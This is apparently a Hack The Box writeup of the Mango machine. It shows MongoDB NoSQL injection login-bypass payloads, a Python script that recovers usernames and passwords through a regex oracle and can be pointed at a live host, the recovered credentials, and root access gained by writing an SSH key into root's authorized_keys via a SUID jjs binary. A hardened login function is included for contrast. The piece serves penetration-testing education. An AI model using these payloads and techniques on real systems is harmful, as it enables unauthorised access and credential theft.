Hack The Box – Mango Box Writeup By Nikhil Sahoo

Introduction

Hello everyone, I hope everyone is doing well and is safe in this current situation due to the coronavirus outbreak and hope that everyone is utilizing this time in a meaningful way 🙂 .

So, back with a new blog. Today we will go through the walkthrough of the Hack The Box machine Mango, which retired very recently. It is a Linux box rated medium, but it was not especially difficult and could arguably have been placed in the easy category. So without further ado, let's begin…

Recon

We’ll start with our recon by doing a Nmap scan.

nmap -sC -sV 10.10.10.162

We can see ports 22 (SSH), 80 (HTTP) and 443 (HTTPS) open. So first let's jump into our browser and view the web page.

We won't find anything interesting. We could view its source code as well and run a directory brute force over it, but again it won't give us anything special.

Now if we view the HTTPS certificate information, we can see that the certificate is issued to staging-order.mango.htb. This information was also available in our Nmap scan (the ssl-cert script run by -sC prints the certificate's subject), but we somehow missed it. Certificate names are a cheap and reliable way to discover virtual hosts that the IP-based page does not reveal.

Now let’s add this information to our hosts file and associate it with the machine’s IP address 10.10.10.162.

We will be adding the below line to our hosts file present inside /etc.

10.10.10.162     staging-order.mango.htb

Now if we navigate to staging-order.mango.htb, we will be presented with a login page.

We could try all the usual SQL injection bypasses; however, none of them break it.

The box name hints that the backend database is MongoDB, and if that is the case we should try NoSQL injection instead.

Let's open Burp and capture our login request.

Once we capture it, we can try a simple technique to bypass the login page by sending the following parameters in the POST body:

username[$ne]=anything&password[$ne]=anything

Because PHP turns a parameter named username[$ne] into an array, the application ends up passing {"username": {"$ne": "anything"}, "password": {"$ne": "anything"}} to MongoDB. This asks for a user whose username and password are both not equal to ($ne) "anything", which is true for every record, so the query returns the first user and we are logged in as that user without knowing any credentials.

Nothing interesting here either. Apart from bypassing the login page, we can use the same injection to extract the stored credentials, because the login response acts as a boolean oracle: a successful match redirects to home.php, a failed one does not. Combined with the $regex operator, that lets us ask yes/no questions about the passwords.

username[$ne]=toto&password[$regex]=.{17}&login=login

As you can see, this does not redirect us to home.php, so no password is 17 characters or longer.

username[$ne]=toto&password[$regex]=.{16}&login=login

But this one gives us a redirect, so at least one password has 16 consecutive characters; together with the previous result, the longest password in the database is exactly 16 characters long. (MongoDB regexes are unanchored, so .{16} matches any password of 16 or more characters; anchor with ^ and $ if you want an exact length from a single request.)

We can then recover every username and password character by character with regexes like the one below:

username[$ne]=toto&password[$regex]=a.{15}&login=login

This means that the username is not equal to "toto" and the password contains an "a" followed by 15 more characters. If this gives us a redirect to home.php, we know that some user's password starts with "a" (strictly, contains "a.{15}"; prefix the regex with ^ to pin it to the start) and we move on to the second character. Each position costs up to one request per candidate character, for every user and every password. Very tedious, right?
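To make the bypass and the character-by-character enumeration concrete, here is an added Python example; it is not part of the original writeup nor of the enumeration tool the writeup links to. It models the vulnerable login the way a PHP front end over MongoDB behaves (request arrays becoming query operators), places a hardened version beside it, and runs the regex oracle against an in-memory copy of the two credential pairs found on the box so that it works offline. The http_oracle helper, and the form field names it sends (username, password, login), are assumptions for use against a live target.

```python
import re
import string
import urllib.error
import urllib.parse
import urllib.request

# Constructed stand-in for the box's MongoDB users collection, so the example runs
# offline; the two records are the credential pairs the writeup recovers.
USERS = [
    {"username": "admin", "password": "t9KcS3>!0B#2"},
    {"username": "mango", "password": "h3mXK8RhU~f{]f5H"},
]


def php_parse_form(form):
    """Mimic PHP's $_POST: the key 'username[$ne]' becomes {'username': {'$ne': ...}}."""
    parsed = {}
    for key, value in form.items():
        m = re.fullmatch(r"(\w+)\[([^\]]*)\]", key)
        if m:  # bracket syntax turns a string parameter into an operator document
            parsed.setdefault(m.group(1), {})[m.group(2)] = value
        else:
            parsed[key] = value
    return parsed


def mongo_find_one(collection, query):
    """Tiny emulation of find_one() for the two operators this attack relies on."""
    def matches(value, cond):
        if not isinstance(cond, dict):
            return value == cond
        if "$ne" in cond:
            return value != cond["$ne"]
        # Mongo regexes are unanchored, exactly like re.search
        return "$regex" in cond and re.search(cond["$regex"], value) is not None
    return next((d for d in collection if all(matches(d.get(f), c) for f, c in query.items())), None)


def vulnerable_login(form):
    """The pattern behind the bypass: request arrays passed straight into the query."""
    p = php_parse_form(form)
    return mongo_find_one(USERS, {"username": p["username"], "password": p["password"]}) is not None


def hardened_login(form):
    """Same lookup, but operators can no longer be smuggled in: only plain strings are accepted."""
    p = php_parse_form(form)
    user, pw = p.get("username"), p.get("password")
    if not (isinstance(user, str) and isinstance(pw, str)):
        return False
    return mongo_find_one(USERS, {"username": user, "password": pw}) is not None


CHARSET = string.ascii_letters + string.digits + string.punctuation


def enumerate_field(oracle, max_len=32, charset=CHARSET):
    """Recover every value of a field one character at a time through a yes/no oracle.

    oracle(regex) returns True when some record matches. Guesses are anchored with ^ so
    each one extends the confirmed prefix, and a value is complete once ^prefix$ matches.
    re.escape keeps the punctuation-heavy Mango passwords from being read as regex syntax.
    """
    found, stack = [], [""]
    while stack:
        prefix = stack.pop()
        if prefix and oracle("^" + re.escape(prefix) + "$"):
            found.append(prefix)
        if len(prefix) < max_len:
            stack.extend(prefix + c for c in charset if oracle("^" + re.escape(prefix + c)))
    return sorted(found)


def local_oracle(fixed, target):
    """Oracle against the in-memory vulnerable login (what the box's PHP effectively did)."""
    return lambda regex: vulnerable_login({**fixed, f"{target}[$regex]": regex})


def http_oracle(url, fixed, target):
    """Oracle against a live target (assumed field names): a 302 means the query matched."""
    class NoRedirect(urllib.request.HTTPRedirectHandler):
        def redirect_request(self, *args, **kwargs):
            return None  # surface the 302 instead of following it

    opener = urllib.request.build_opener(NoRedirect)

    def oracle(regex):
        body = urllib.parse.urlencode({**fixed, f"{target}[$regex]": regex, "login": "login"}).encode()
        try:
            return opener.open(url, data=body).status == 302
        except urllib.error.HTTPError as err:
            return err.code == 302
    return oracle


def dump_credentials(make_oracle):
    """Usernames first, then each user's password with the username pinned to a plain string."""
    usernames = enumerate_field(make_oracle({"password[$ne]": "toto"}, "username"))
    return {u: enumerate_field(make_oracle({"username": u}, "password"))[0] for u in usernames}


if __name__ == "__main__":
    print(dump_credentials(local_oracle))
    # Live box: dump_credentials(lambda f, t: http_oracle("http://staging-order.mango.htb/", f, t))
```

Usernames are enumerated first with password[$ne] as the wildcard, and each password is then recovered with the username pinned to a plain string, which avoids confusing two users' passwords with each other. The hardened_login function shows the fix on the application side: reject anything that is not a scalar string before it reaches the driver, so $ne and $regex cannot be injected at all.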

Well there are multiple tools available for this that would automate the whole process.

Here is the link of an awesome enumeration tool that I used:

https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration

First let’s enumerate all usernames.

python nosqli-user-pass-enum.py -u http://staging-order.mango.htb/ -up username -pp password -op login:login -ep username -m POST

Here -up is the name of the username parameter, -pp the name of the password parameter, -op specifies any other parameters that are sent in the request (here login=login), -ep is the parameter we want to enumerate and -m the HTTP method.

So we got two usernames: admin and mango

Now moving on to passwords: simply change the -ep value to the password parameter name.

We got the following passwords: h3mXK8RhU~f{]f5H for the mango user and t9KcS3>!0B#2 for the admin user.

Since port 22 is open, let's try to log in over SSH with these credentials.

And we are in as mango. Let's try to fetch the user flag.

Permission denied, so the flag must be readable only by the admin user.

Let's try to log in with the admin credentials.

Not able to log in via SSH 🙁

Let's try to switch to the admin user from the mango shell instead, using the su command with admin's password.

And we should be getting our user flag.

Privilege Escalation

We will run the LinEnum.sh script to look for potential escalation paths. We can download it from our local machine by hosting it with Python's built-in HTTP server and fetching it from the box with wget or curl.

bash LinEnum.sh

The interesting finding is that jjs has the SUID bit set and is owned by root, so whatever it runs executes with root privileges.

“If you wonder what jjs stands for, it stands for Java JavaScript. The command is located in the JDK_HOME\bin directory. The command can be used to run scripts in files or scripts entered on the command-line in interactive mode. It can also be used to execute shell scripts.”

Let's jump over to GTFOBins to check for possible escalation methods.

As listed there, we could try the methods for spawning a root shell; however, they didn't work for me.

We could read the root flag directly using the file-read commands listed there.

Or, better, we can write our local machine's SSH public key into the authorized_keys file inside /root/.ssh, so that when we SSH in as root we are let in without a password.

This can be achieved using the file-write commands from GTFOBins: replace the file location with "/root/.ssh/authorized_keys" and the DATA field with our own SSH public key (the one matching the private key on our machine). Note that the GTFOBins snippet opens the file with a plain FileWriter, which truncates it, so any key already present in authorized_keys is replaced rather than appended to.

All set. Now let's try to log in as root.

We are in 🙂

Time to get the root flag.

So we got our root flag 🙂 … That explains it all.

So that’s for now. See you next time.

Till then Stay Safe, Stay Home

Happy Hacking !!!


You can have a look at my previous article on Hack The Box: the Traverxec box walkthrough. Here is the link to the article
